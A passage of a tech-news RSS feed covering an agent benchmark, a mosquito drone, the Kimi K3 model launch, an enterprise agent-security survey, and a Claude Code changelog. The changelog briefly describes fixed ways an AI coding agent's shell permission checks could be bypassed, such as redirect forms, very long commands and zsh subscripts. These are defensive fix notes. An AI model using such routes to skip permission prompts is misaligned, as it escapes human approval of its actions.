<title><![CDATA[Perplexity AI Releases WANDR: An Open Benchmark Evaluating Research Agents That Must Search Wide And Deep]]></title>
<description><![CDATA[Perplexity's WANDR is an open benchmark and evaluation harness with 500 evidence-heavy tasks. It tests whether research agents can discover many qualifying entities and back each one with cited, re-verifiable evidence. Perplexity Search as Code leads at 0.363 soft F1 and 0.133 hard F1.
The post P...]]></description>
<link>https://tsecurity.de/de/3679066/ai-nachrichten/perplexity-ai-releases-wandr-an-open-benchmark-evaluating-research-agents-that-must-search-wide-and-deep/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679066/ai-nachrichten/perplexity-ai-releases-wandr-an-open-benchmark-evaluating-research-agents-that-must-search-wide-and-deep/</guid>
<pubDate>Sun, 19 Jul 2026 09:33:16 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Perplexity's WANDR is an open benchmark and evaluation harness with 500 evidence-heavy tasks. It tests whether research agents can discover many qualifying entities and back each one with cited, re-verifiable evidence. Perplexity Search as Code leads at 0.363 soft F1 and 0.133 hard F1.</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/19/perplexity-ai-releases-wandr-an-open-benchmark-evaluating-research-agents-that-must-search-wide-and-deep/">Perplexity AI Releases WANDR: An Open Benchmark Evaluating Research Agents That Must Search Wide And Deep</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A mosquito-hunting killer drone is available for preorder – and I have questions]]></title>
<description><![CDATA[Y Combinator-backed startup Tornyol has built a tiny autonomous drone that tracks mosquitoes by sonar and kills them mid-flight, with preorders open now. We look at the tech, the pricing, and the questions it raises about where the targeting stops.]]></description>
<link>https://tsecurity.de/de/3677603/it-nachrichten/a-mosquito-hunting-killer-drone-is-available-for-preorder-and-i-have-questions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677603/it-nachrichten/a-mosquito-hunting-killer-drone-is-available-for-preorder-and-i-have-questions/</guid>
<pubDate>Sat, 18 Jul 2026 09:18:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Y Combinator-backed startup Tornyol has built a tiny autonomous drone that tracks mosquitoes by sonar and kills them mid-flight, with preorders open now. We look at the tech, the pricing, and the questions it raises about where the targeting stops.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.214]]></title>
<description><![CDATA[What's changed

Fixed single-segment dir/** allow rules like Edit(src/**) auto-approving writes to nested dir/ directories anywhere in the tree instead of only /dir
Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions
Fixed Bash permission checks to fail close...]]></description>
<link>https://tsecurity.de/de/3677323/downloads/v21214/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677323/downloads/v21214/</guid>
<pubDate>Sat, 18 Jul 2026 03:46:25 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Fixed single-segment <code>dir/**</code> allow rules like <code>Edit(src/**)</code> auto-approving writes to nested <code>dir/</code> directories anywhere in the tree instead of only <code>&lt;cwd&gt;/dir</code></li>
<li>Fixed a permission-check bypass affecting commands run in Windows PowerShell 5.1 sessions</li>
<li>Fixed Bash permission checks to fail closed on file-descriptor redirect forms that bash parses differently than the permission analyzer</li>
<li>Fixed Bash permission checks misjudging very long commands — commands over 10,000 characters now always prompt instead of running automatically</li>
<li>Fixed Bash permission checks treating zsh variable subscripts and modifiers in <code>[[ ]]</code> comparisons as inert text — these commands now prompt for approval</li>
<li>Fixed Bash permission checks to no longer auto-approve certain <code>help</code> and <code>man</code> commands that could run unsafe options, command substitutions, or backslash paths</li>
<li>Fixed permission prompts on remote sessions that could proceed before the local confirmation dialog</li>
<li>Added the EndConversation tool: Claude can end sessions with highly abusive users or jailbreak attempts, as on claude.ai since 2025 — see <a href="https://www.anthropic.com/research/end-subset-conversations" rel="nofollow">https://www.anthropic.com/research/end-subset-conversations</a></li>
<li>Added a periodic progress heartbeat for long-running tool calls that previously went silent</li>
<li>Added an ISO <code>modified</code> timestamp to memory file frontmatter</li>
<li>Added <code>message.uuid</code>, <code>client_request_id</code>, and <code>tool_source</code> attributes to OpenTelemetry log events for message-level correlation and tool provenance</li>
<li>Added <code>CLAUDE_CODE_OTEL_CONTENT_MAX_LENGTH</code> to configure the 60 KB truncation limit on OpenTelemetry content attributes</li>
<li>Added reasoning effort to the <code>subagentStatusLine</code> payload, so custom agent rows can render model and effort</li>
<li>Added permission prompts for <code>docker</code> commands (including the Podman <code>docker</code> shim) carrying daemon-redirect flags (<code>--url</code>, <code>--connection</code>, <code>--identity</code>, and Podman's remote mode) that previously ran without one</li>
<li>Fixed a crash when a GrowthBook feature evaluates to null, and a bug where a malformed flag payload could wipe the cached feature flags</li>
<li>Fixed Bash tool killing the Claude session when a <code>pkill -f</code> pattern accidentally matched the CLI's own process (Linux)</li>
<li>Fixed unbounded memory growth when <code>--settings</code> points at a device file or multi-GB file; oversized (&gt;2 MiB) settings files now fail at startup with a clear error</li>
<li>Fixed streaming turns failing with "Socket is closed" behind corporate proxies on Windows</li>
<li>Fixed stream-json output truncation at exit for slow-reading SDK/pipeline consumers; the exit drain now scales with queued bytes instead of a flat 2s cap</li>
<li>Fixed scheduled tasks refusing their own configured prompt as untrusted input — the fired prompt is now delivered as the session's assigned task</li>
<li>Fixed PowerShell tool commands hanging until timeout when a child process waited on standard input (Windows)</li>
<li>Fixed Python scripts under the PowerShell tool crashing with UnicodeDecodeError when reading non-UTF-8 data from standard input (Windows)</li>
<li>Fixed Python scripts run via the PowerShell tool crashing with UnicodeEncodeError on non-ASCII output, and PowerShell 7 error messages containing raw ANSI escape sequences (Windows)</li>
<li>Fixed the PowerShell tool reporting <code>where.exe</code>, <code>fc.exe</code>, and <code>diff.exe</code> as errors when they return a valid negative answer (Windows)</li>
<li>Fixed <code>&gt;</code> and <code>&gt;&gt;</code> under the PowerShell tool on Windows PowerShell 5.1 writing UTF-16LE files that other tools couldn't read as UTF-8</li>
<li>Fixed a displaced background daemon deleting its successor's control socket on shutdown, which made the next client kill the healthy replacement daemon</li>
<li>Fixed background sessions parked with <code>←</code> or <code>/background</code> and left idle keeping the background daemon and a worker process alive indefinitely</li>
<li>Fixed completed background sessions being impossible to remove via <code>claude rm</code> or the agent view once the background service had gone idle</li>
<li>Fixed background sessions dispatched from a non-git folder being impossible to delete from the agents view</li>
<li>Fixed reopening a stopped background session failing to restore its saved conversation when an unreadable folder exists in the session store</li>
<li>Fixed the Remote Control "session ready" push notification firing for sessions where Remote Control was not explicitly enabled</li>
<li>Fixed <code>/install-github-app</code> and the <code>/mcp</code> settings menu being blocked in agent-view sessions — they're now refused only in background sessions with no terminal attached</li>
<li>Fixed plugins enabled via the <code>--settings</code> CLI flag not loading (regression since v2.1.181)</li>
<li>Fixed feature flags going stale in long-running sessions after the OAuth token rotates</li>
<li>Fixed <code>/ultrareview</code> refusing to run in repos with no merge base — it now offers to review all tracked files</li>
<li>Fixed <code>claude update</code> and <code>claude doctor</code> hanging silently, and the <code>/status</code> System diagnostics section going blank, when a shell-config path is a directory</li>
<li>Fixed memory frontmatter values being silently truncated at an inline <code>#</code> when memory files are saved</li>
<li>Fixed session cost and token telemetry double-counting on streams that emit multiple cumulative <code>message_delta</code> frames</li>
<li>Fixed a spurious "check your network" warning that appeared while the advisor was thinking</li>
<li>Fixed hooks with exit code 2 not blocking as documented when the hook's stdout JSON fails schema validation</li>
<li>Fixed OTel log events emitted outside the turn's async context missing the interaction span's trace context</li>
<li>Fixed MCP transient errors during prompts/resources refresh clearing the server's slash commands and resources</li>
<li>Improved the <code>claude rc</code> workspace-trust error in the home directory to say trust there is never saved and to suggest running from a project directory</li>
<li>Changed single-segment <code>dir/**</code> hook <code>if:</code> conditions to match only <code>&lt;cwd&gt;/dir</code>; write <code>**/dir/**</code> for any-depth matching. <code>deny</code>/<code>ask</code> permission rules keep their any-depth match.</li>
<li>Changed <code>file</code> commands using <code>-m</code>/<code>--magic-file</code> or <code>-f</code>/<code>--files-from</code> to require permission instead of being auto-allowed as read-only</li>
<li>Changed keep-alive connection pooling to disable after a stale-connection error, so retries open a fresh socket</li>
<li>Changed SessionStart hooks to report source <code>"fork"</code> when a session begins as a fork instead of <code>"resume"</code></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[HP's 20-core Elite Mini 800 G9 is a heavy-duty desktop replacement — and it’s $700 off at Amazon]]></title>
<description><![CDATA[HP's Elite Mini 800 G9 is a 20-core business-grade desktop replacement.]]></description>
<link>https://tsecurity.de/de/3676488/it-nachrichten/hps-20-core-elite-mini-800-g9-is-a-heavy-duty-desktop-replacement-and-its-700-off-at-amazon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676488/it-nachrichten/hps-20-core-elite-mini-800-g9-is-a-heavy-duty-desktop-replacement-and-its-700-off-at-amazon/</guid>
<pubDate>Fri, 17 Jul 2026 17:33:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[HP's Elite Mini 800 G9 is a 20-core business-grade desktop replacement.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ex-MBDA engineer builds $1,100, 40g AI micro-drone using AMD phased-array sonar for YC-backed startup Tornyol to eradicate mosquitoes, currently restricted to 3-minute flights]]></title>
<description><![CDATA[Former MBDA engineer Alex Toussaint creates an AI mosquito-hunting drone using sonar, though battery limits restrict current operations.]]></description>
<link>https://tsecurity.de/de/3676360/it-nachrichten/ex-mbda-engineer-builds-1100-40g-ai-micro-drone-using-amd-phased-array-sonar-for-yc-backed-startup-tornyol-to-eradicate-mosquitoes-currently-restricted-to-3-minute-flights/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676360/it-nachrichten/ex-mbda-engineer-builds-1100-40g-ai-micro-drone-using-amd-phased-array-sonar-for-yc-backed-startup-tornyol-to-eradicate-mosquitoes-currently-restricted-to-3-minute-flights/</guid>
<pubDate>Fri, 17 Jul 2026 16:47:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Former MBDA engineer Alex Toussaint creates an AI mosquito-hunting drone using sonar, though battery limits restrict current operations.]]></content:encoded>
</item>
<item>
<title><![CDATA[Frustration as Post Office Horizon replacement contract signing delayed again]]></title>
<description><![CDATA[If signed off, cloud-based EPOS system will replace controversial Horizon software from Fujitsu]]></description>
<link>https://tsecurity.de/de/3675932/it-nachrichten/frustration-as-post-office-horizon-replacement-contract-signing-delayed-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675932/it-nachrichten/frustration-as-post-office-horizon-replacement-contract-signing-delayed-again/</guid>
<pubDate>Fri, 17 Jul 2026 13:48:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If signed off, cloud-based EPOS system will replace controversial Horizon software from Fujitsu]]></content:encoded>
</item>
<item>
<title><![CDATA[SpaceX Starship Flight Test 13 takes issue with the 'flight' bit]]></title>
<description><![CDATA[Engine replacement needed after launchpad abort]]></description>
<link>https://tsecurity.de/de/3675868/it-nachrichten/spacex-starship-flight-test-13-takes-issue-with-the-flight-bit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675868/it-nachrichten/spacex-starship-flight-test-13-takes-issue-with-the-flight-bit/</guid>
<pubDate>Fri, 17 Jul 2026 13:18:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Engine replacement needed after launchpad abort]]></content:encoded>
</item>
<item>
<title><![CDATA[Home Office hands £28M to immigration IT incumbents after procurement challenge]]></title>
<description><![CDATA[Continuity support required after £336 million replacement deal delayed by more than a year]]></description>
<link>https://tsecurity.de/de/3675471/it-nachrichten/home-office-hands-28m-to-immigration-it-incumbents-after-procurement-challenge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675471/it-nachrichten/home-office-hands-28m-to-immigration-it-incumbents-after-procurement-challenge/</guid>
<pubDate>Fri, 17 Jul 2026 10:32:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Continuity support required after £336 million replacement deal delayed by more than a year]]></content:encoded>
</item>
<item>
<title><![CDATA[China’s Moonshot AI releases Kimi K3, the largest open-source model ever, rivaling top U.S. systems]]></title>
<description><![CDATA[Moonshot AI, the Beijing-based artificial intelligence startup backed by Alibaba, on Thursday released Kimi K3 — a 2.8-trillion-parameter model that the company says is now the largest open-source AI model in the world, and one that benchmarks show performs neck-and-neck with the most powerful pr...]]></description>
<link>https://tsecurity.de/de/3674665/it-nachrichten/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-us-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674665/it-nachrichten/chinas-moonshot-ai-releases-kimi-k3-the-largest-open-source-model-ever-rivaling-top-us-systems/</guid>
<pubDate>Thu, 16 Jul 2026 23:17:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.moonshot.ai/">Moonshot AI,</a> the Beijing-based artificial intelligence startup backed by Alibaba, on Thursday released <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> — a 2.8-trillion-parameter model that the company says is now the largest open-source AI model in the world, and one that benchmarks show performs neck-and-neck with the most powerful proprietary systems from <a href="https://www.anthropic.com/">Anthropic</a> and <a href="https://openai.com/">OpenAI</a>.</p><p>The release, timed to land just ahead of the <a href="https://aiii.global/waic-2026/">2026 World Artificial Intelligence Conference</a> in Shanghai, is a dramatic escalation in the global AI arms race and a watershed moment for the open-source AI movement. It also marks a remarkable comeback for a company whose market position had eroded significantly over the past 18 months following DeepSeek's meteoric rise.</p><p>Full model weights are scheduled to be released on July 27, according to details shared by researchers who reviewed the company's technical documentation. If you want to take <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> for a spin right now, you can — just head to<a href="https://www.kimi.com/"> kimi.com</a>, sign up with a Google account or phone number (no credit card required), and start chatting with what may be the most powerful open-source model ever built.</p><div></div><h2><b>Inside the architecture that powers the world's largest open-source AI model</b></h2><p><a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> is a frontier-class large language model with 2.8 trillion total parameters — roughly 75 percent larger than <a href="https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro">DeepSeek's V4 Pro</a>, which the company's own timeline chart shows at approximately 1.6 trillion parameters. The model features a 1-million-token context window, native visual understanding capabilities, and an always-on reasoning mode that the company calls "thinking mode."</p><p>The model is built on two key architectural innovations developed internally at Moonshot AI: <a href="https://arxiv.org/abs/2510.26692">Kimi Delta Attention</a>, a hybrid linear attention mechanism, and <a href="https://arxiv.org/abs/2603.15031">Attention Residuals</a>, which the company describes as a drop-in replacement for residual connections that delivers consistent scaling gains. Both techniques were previously published as open research by the Moonshot team on <a href="https://github.com/moonshotai">GitHub</a>.</p><p>On the <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">API side</a>, Kimi K3 is compatible with the <a href="https://developers.openai.com/api/docs/guides/agents">OpenAI SDK</a>, lowering the integration barrier for developers already building on OpenAI or Anthropic toolchains. The model is priced at $3 per million input tokens and $15 per million output tokens, with cached input tokens dropping to just $0.30 per million — pricing that positions it roughly in line with mid-tier offerings from Western labs, but at a performance level the company claims approaches the top of the market. A promotional top-up rebate running through August 12 offers up to 30 percent back in vouchers for API credits of $1,000 or more.</p><p>As <a href="https://finance.sina.com.cn/stock/t/2026-07-17/doc-inihzrtu1375218.shtml?cref=cj">Xinhua reported</a>, a Moonshot AI executive explained the significance of the parameter count in simple terms: parameters are like neural connections in the human brain, and nearly 3 trillion of them means the model can "store more knowledge and patterns in its brain, understand more, think deeper, and answer more accurately."</p><div></div><h2><b>Benchmark results show Kimi K3 trading blows with Claude and GPT at the top of the leaderboard</b></h2><p>The benchmark results, drawn from public leaderboard data and a private evaluation by analytics firm Artificial Analysis, tell a striking story.</p><p>On <a href="https://artificialanalysis.ai/evaluations/gdpval-aa">GDPval-AA v2</a>, a benchmark measuring real-world tasks across 44 occupations and 9 major industries, Kimi K3 scored 1,687 — placing it third overall, behind only Claude Fable 5 Max (1,815) and GPT-5.6 Sol Max (1,747.8), and ahead of Claude Opus 4.8 (1,600).</p><p>On <a href="https://artificialanalysis.ai/evaluations/aa-briefcase">AA-Briefcase</a>, a private agentic benchmark from Artificial Analysis designed to test long-horizon knowledge work, K3 climbed to second place with a score of 1,527 — beating GPT-5.6 Sol Max (1,495) and trailing only Fable 5 Max (1,587).</p><p>Perhaps most impressively, K3 achieved a state-of-the-art score of 91.2 out of 100 on <a href="https://openai.com/index/browsecomp/">BrowseComp</a>, a benchmark for long-horizon, high-difficulty information seeking. </p><p>The company says it accomplished this in a single-agent setup using its 1-million-token context window, without any context compression or additional context management techniques — a feat that suggests raw context length, when paired with strong retrieval capabilities, may be more powerful than elaborate multi-agent workarounds.</p><p>As <a href="https://x.com/kimmonismus/status/2077818040578695175">one widely followed AI commentator</a> put it on social media: "Open source is no longer lagging six months behind Western closed-source models. Read that again, and think about what it all means."</p><p>That observation captures the significance of the moment. For much of the past three years, open-source models have typically trailed their proprietary counterparts by a meaningful margin. Kimi K3 appears to have closed that gap almost entirely.</p><h2><b>How a 48-hour autonomous chip design demo reveals Moonshot's real ambitions</b></h2><p>Beyond raw benchmarks, <a href="https://www.moonshot.ai/">Moonshot AI</a> showcased a proof-of-concept that may be even more revealing of K3's capabilities and the company's strategic direction.</p><p>In a demonstration documented in the company's technical materials, <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> was tasked with designing a physical chip to run a nano-scale version of itself. Over 48 hours of continuous autonomous agent operation, K3 independently completed the chip's full construction pipeline — from architectural design through optimization and verification — using open-source electronic design automation tools. The result was a tiny but functional chip design, just 4 square millimeters, that achieved timing convergence at 100 MHz and could decode more than 8,700 tokens per second in simulation.</p><p>This is not a production chip. It is a demonstration of what <a href="https://www.moonshot.ai/">Moonshot AI</a> clearly views as the next competitive frontier: long-range autonomous agent capabilities. The ability to sustain coherent, multi-step technical work over a 48-hour window — reading documentation, making design decisions, running verification loops, and iterating on failures — represents a qualitative leap beyond the kind of single-turn question-answering that defined the first generation of large language models.</p><p>The company also highlighted a case in computational astrophysics, where K3 reportedly reproduced the universal <a href="https://inspirehep.net/literature/1220233">I-Love-Q relation</a> — a complex calculation that typically takes a senior researcher one to two weeks — in approximately two hours, reading and cross-validating more than 20 papers and implementing a complete numerical pipeline along the way.</p><h2><b>Moonshot AI's fall and rise tells the story of China's brutal AI market</b></h2><p>To understand why <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> matters, you need to understand where Moonshot AI was 18 months ago — and how far it fell.</p><p>Founded in 2023 by <a href="https://kimiyoung.github.io/">Yang Zhilin</a>, a Tsinghua University graduate who previously conducted research at Google and Meta, Moonshot AI quickly became one of China's most prominent AI startups. The company gained early traction in 2024 when users flocked to its <a href="http://kimi.ai/">Kimi platform</a> for its long-text analysis capabilities and AI search functions. By early 2026, it had raised roughly <a href="https://www.forbes.com/sites/the-prompt/2026/07/15/ai-startup-reflection-compute-deal-to-challenge-chinas-open-source-dominance/">$1.5 billion</a> across multiple rounds, with its valuation climbing from $2.5 billion to $4.3 billion and the company reportedly <a href="https://tech.yahoo.com/ai/gemini/articles/china-moonshot-releases-open-source-141110760.html">seeking a new round at $5 billion</a>.</p><p>Then DeepSeek happened. The release of DeepSeek's low-cost R1 model in January 2025 disrupted the entire Chinese AI landscape, and Moonshot AI was among the hardest hit. Kimi, which had ranked third in monthly active users in China, slid to seventh. The company's strategic pivot to open-source models — beginning with Kimi K2 in July 2025 and accelerating with K2.5 in January 2026 — was in large part an effort to reclaim relevance.</p><p><a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">Kimi K3</a> is the culmination of that effort — and the sheer scale of the model suggests that Moonshot AI has been planning this move for some time. Training a 2.8-trillion-parameter model requires enormous computational resources and months of preparation, which means the architectural and infrastructure decisions behind K3 were likely locked in well before the model reached the public.</p><h2><b>Why open-sourcing the world's biggest model is a geopolitical chess move</b></h2><p>The decision to release K3's full weights on July 27 is strategically significant and worth parsing carefully.</p><p>The company's own timeline chart of open-source frontier model scale positions K3 as a dramatic outlier, towering above competitors like <a href="https://github.com/deepseek-ai">DeepSeek</a> (1.6T), <a href="https://github.com/xiaomi">Xiaomi</a> (1.02T), and <a href="https://github.com/ALIBABA">Alibaba</a> (397B). By releasing the world's largest open-source model, Moonshot AI is making a bid to become the center of gravity for the global open-source AI developer community.</p><p>This follows a broader trend among Chinese AI companies. As <a href="https://www.reuters.com/technology/artificial-intelligence/china-weighs-silicon-curtain-around-sought-after-ai-models-2026-07-08/">Reuters noted</a>, open-sourcing allows companies to "showcase their technological capabilities and expand developer communities as well as their global influence, a strategy likely to help China counter U.S. efforts to limit Beijing's tech progress." DeepSeek, Alibaba, Tencent, and Baidu have all released open-source models. But none have released anything at this parameter count.</p><p>For enterprise technology leaders, the implications are concrete. A 2.8-trillion-parameter open-source model that performs at near-frontier levels creates new options for companies that want to fine-tune, self-host, or build proprietary systems on top of a capable base model — without being locked into API contracts with OpenAI or Anthropic. The trade-off, of course, is that running a model of this size requires substantial GPU infrastructure. Inference at 2.8 trillion parameters is not something that runs on a single server rack.</p><p>That said, <a href="https://www.moonshot.ai/">Moonshot AI</a> has signaled awareness of this challenge. Its Mooncake project, which won the Best Paper award at FAST 2025, pioneered KV-cache-centric disaggregated serving for large language models — an architecture designed specifically to make inference at extreme scale more practical and cost-efficient.</p><h2><b>Kimi Code and a three-tier model lineup form the foundation of Moonshot's enterprise play</b></h2><p>Alongside K3, Moonshot AI continues to invest heavily in its coding agent ecosystem. <a href="https://github.com/MoonshotAI/kimi-code/releases">Kimi Code</a>, the company's open-source coding tool that competes with Anthropic's Claude Code and Google's Gemini CLI, received two major updates on the same day as K3's launch — versions 0.25.0 and 0.26.0 — adding features like expanded subagent tooling, background task management, and security fixes.</p><p>The <a href="https://github.com/MoonshotAI/kimi-cli">Kimi Code CLI</a> has accumulated over 3,100 stars on GitHub and features integration with VSCode, Cursor, and Zed. The latest release expanded the "coder subagent" tool set to include background tasks, todo lists, plan mode, skill invocation, and nested agents — effectively turning the coding agent into a multi-layered autonomous system capable of managing complex software engineering projects with minimal human intervention.</p><p>This is not incidental. Coding tools have become a critical revenue driver for AI labs. As Anthropic disclosed in January, <a href="https://www.anthropic.com/news/anthropic-acquires-bun-as-claude-code-reaches-usd1b-milestone">Claude Code reached $1 billion in annualized recurring revenue</a>. By building Kimi Code as an open-source alternative that defaults to Kimi's own models — but supports other providers — Moonshot AI is positioning itself to capture developer workflows and, eventually, enterprise contracts.</p><p>The company's model lineup now includes three tiers: <a href="https://platform.kimi.ai/docs/guide/kimi-k3-quickstart">K3</a> as the flagship ($3/$15 per million tokens for input/output), <a href="https://platform.kimi.ai/docs/guide/kimi-k2-7-code-quickstart">K2.7 Code</a> as a specialized coding model ($0.95/$4), and <a href="https://platform.kimi.ai/docs/guide/kimi-k2-6-quickstart">K2.6</a> as a general-purpose option ($0.95/$4). All three support context windows of 256,000 tokens or above, with K3 offering the full 1-million-token window. Context caching is automatic — no cache ID, TTL, or extra parameter is required — a small but meaningful developer-experience advantage over competitors that require explicit cache management.</p><h2><b>What Kimi K3 means for the future of enterprise AI and the global model landscape</b></h2><p>Kimi K3's release forces a recalibration of several assumptions that have guided enterprise AI strategy.</p><p>The performance gap between open-source and proprietary models has functionally closed at the frontier. If K3's benchmark numbers hold up under independent evaluation — and particularly once the open weights are available for community testing on July 27 — it will be difficult for closed-source providers to justify premium pricing purely on the basis of capability.</p><p>The locus of AI innovation, meanwhile, continues to shift. China's AI ecosystem, which many Western observers questioned after early struggles with chip export restrictions, has now produced a model that competes with the best systems from companies with direct access to Nvidia's most advanced hardware. The architectural innovations behind K3 — particularly the hybrid linear attention mechanism — suggest that algorithmic efficiency may matter as much as raw compute.</p><p>And the agentic capabilities demonstrated by K3 — chip design, multi-week research compression, long-horizon information seeking — point toward a future where AI models are not just answering questions but autonomously executing complex, multi-day projects. For enterprises evaluating AI investments, this shifts the value proposition from "productivity copilot" to "autonomous technical workforce."</p><p><a href="https://finance.sina.com.cn/stock/t/2026-07-17/doc-inihzrtu1375218.shtml?cref=cj">Xinhua</a>, China's state news agency, framed the release as a national milestone, reporting that K3 "marks a new step forward in the development of China's artificial intelligence models." Liu Tieyan, dean of the Zhongguancun Academy in Beijing, was quoted as saying that a wave of Chinese open-source models has moved from isolated breakthroughs to collective advancement, providing "new solutions and new paths" for global AI development.</p><p>Just two years ago, <a href="https://www.moonshot.ai/">Moonshot AI</a> was a scrappy startup named for the audacious problems it hoped to solve. Eighteen months ago, it was a cautionary tale about how quickly a market darling can lose its footing. Today, it is the maker of the world's largest open-source AI model — one that can, given 48 hours and an internet connection, design a chip to run itself. The frontier, it turns out, is not a place. It is a race. And the field just got a lot more crowded.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The agent security gap: 54% of enterprises have already had an AI agent incident, and most still let agents share credentials]]></title>
<description><![CDATA[Across 107 enterprises, AI agents are being given real access to systems and data while the controls meant to contain them lag behind. More than half have already had a confirmed agent security incident or a near-miss; only about a third give every agent its own scoped identity, and most agents s...]]></description>
<link>https://tsecurity.de/de/3674536/it-nachrichten/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674536/it-nachrichten/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials/</guid>
<pubDate>Thu, 16 Jul 2026 21:47:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 107 enterprises, AI agents are being given real access to systems and data while the controls meant to contain them lag behind. More than half have already had a confirmed agent security incident or a near-miss; only about a third give every agent its own scoped identity, and most agents still share credentials; and only three in ten isolate their highest-risk agents. The security stack is overwhelmingly borrowed from the model providers and hyperscalers rather than purpose-built for agents, spending remains a thin slice of the security budget, and enterprises are evenly split on whether their defenses are keeping pace with AI-enabled attackers. The result is an agent security gap — autonomous agents proliferating faster than the identity, isolation, and enforcement controls needed to hold them.</p><p>This wave of VentureBeat Pulse Research examines how enterprises secure their AI agents: what tooling they run, how they manage agent identity and isolation, what has already gone wrong, how much they spend, and whether they believe their defenses are keeping pace with AI-enabled attackers.</p><p>The central finding is an agent security gap — the distance between the autonomy enterprises are granting their agents and the controls in place to contain them. More than half of organizations (54%) have already experienced a confirmed agent security incident (18%) or a near-miss caught before harm (36%). The structural weakness beneath those numbers is identity: only about a third (32%) give every agent its own scoped, managed identity, while the rest report that some agents share credentials or that agents mostly run on shared API keys and human or service-account credentials. When agents share credentials, a single compromised or over-permissioned agent carries a wide blast radius — and only three in ten enterprises (30%) isolate their highest-risk agents in sandboxes to bound that radius.</p><p>What makes the gap notable is how comfortable enterprises are inside it. The security stack is overwhelmingly provider-native — OpenAI’s guardrails (51%), Google’s and Microsoft’s cloud controls, and Anthropic’s managed-agent controls dominate, while the dedicated agent-security specialists barely register — and satisfaction with that borrowed stack is high, averaging 4.2 out of 5. Yet spending remains a thin slice of the security budget, only a third of enterprises believe their AI defenses are ahead of AI-enabled attackers, and a clear majority plan to change tooling within the year. Enterprises are satisfied with controls they are simultaneously preparing to replace.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent security — the tooling, identity, isolation, and enforcement controls organizations use to secure autonomous AI agents. Responses are filtered to organizations with more than 100 employees (n=107; the survey’s smallest size band, 1–100 employees, is excluded), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By role the sample is senior and buyer-credible: 45% are final decision-makers for AI purchases and another 30% recommenders or influencers. Managers (43%), individual contributors (24%), VPs and directors (15%), and the C-suite (11%) make up the seniority mix. By organization size the sample is mid-market-weighted: 251–1,000 (42%) and 101–250 (25%) employees lead, with 1,001–5,000 (19%), 5,001–10,000 (8%), and 10,001+ (7%) above them. Technology/Software is the largest industry at 23%, followed by Manufacturing (15%), Retail/E-commerce (14%), and Healthcare/Life Sciences (13%).</p><p>At 107 respondents the sample is large enough to read directionally but should be treated as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It skews toward the mid-market, so it is best read as the view from organizations actively standing up agent security rather than from the largest operators.</p><p>Satisfaction ratings are computed on the respondents who answered each rating question; the overall satisfaction score reflects 82 of the 107 qualified respondents.</p><h2>Finding 1: The incidents are already here</h2><p><b>More than half have had an agent security incident or near-miss</b></p><p>We asked whether organizations had experienced an agent security incident — a confirmed breach, or a near-miss caught before harm. Most that run agents in production had.</p><div></div><p>This is the report’s defining number. More than half of organizations (54%) have already had an agent security event — 18% a confirmed incident and 36% a near-miss caught before it caused harm. Only 42% report nothing, and a small remainder either run no agents in production or don’t track such events. That so many report near-misses rather than only confirmed incidents is telling: enterprises are catching problems, but they are catching them close to the edge. The controls examined in the rest of this report — identity, isolation, enforcement — are what determine whether the next near-miss stays a near-miss.</p><p>Exposure scales with company 